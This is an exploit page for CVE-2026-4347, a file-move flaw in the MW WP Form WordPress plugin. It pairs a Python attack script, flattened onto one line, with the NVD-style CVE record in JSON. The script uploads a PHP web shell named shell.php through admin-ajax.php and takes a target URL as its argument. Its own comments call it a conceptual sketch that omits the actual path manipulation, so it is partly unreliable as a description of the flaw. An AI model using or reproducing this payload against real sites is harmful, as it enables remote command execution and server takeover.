CVE-2026-4347

import requests # Exploit Title: MW WP Form < 5.1.0 - Unauthenticated Arbitrary File Move to RCE # Date: 2026-04-02 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/plugins/mw-wp-form/ # Version: <= 5.1.0 # Usage: python3 exploit.py <target_url> def exploit(target_url): upload_url = f"{target_url}/wp-admin/admin-ajax.php" # The form must have a file upload field and 'Saving inquiry data in database' enabled # This payload attempts to move a uploaded file to a web accessible location data = { 'mw_wp_form_service': 'save', 'mw_wp_form_key': '<FORM_KEY>', # Replace with actual form key found in page source # ... other form fields ... } files = { 'file_field_name': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/octet-stream') } # Vulnerability allows manipulating the path via generate_user_filepath # This is a conceptual representation of the parameter manipulation response = requests.post(upload_url, data=data, files=files) if response.status_code == 200: print("[+] Payload sent. Check if the file was moved to the target directory.") else: print("[-] Exploit failed.") if __name__ == "__main__": import sys if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <target_url>") else: exploit(sys.argv[1])

{"cve": {"id": "CVE-2026-4347", "sourceIdentifier": "[email protected]", "published": "2026-04-02T06:16:23.297", "lastModified": "2026-04-27T19:04:22.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MW WP Form plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation via the 'generate_user_filepath' function and the 'move_temp_file_to_upload_dir' function in all versions up to, and including, 5.1.0. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). The vulnerability is only exploitable if a file upload field is added to the form and the “Saving inquiry data in database” option is enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/mw-wp-form/tags/5.1.0/classes/controllers/class.main.php#L271", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/mw-wp-form/tags/5.1.0/classes/models/class.directory.php#L138", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/194ee4a0-87c3-42e5-9676-8dd355838b78?source=cve", "source": "[email protected]"}]}}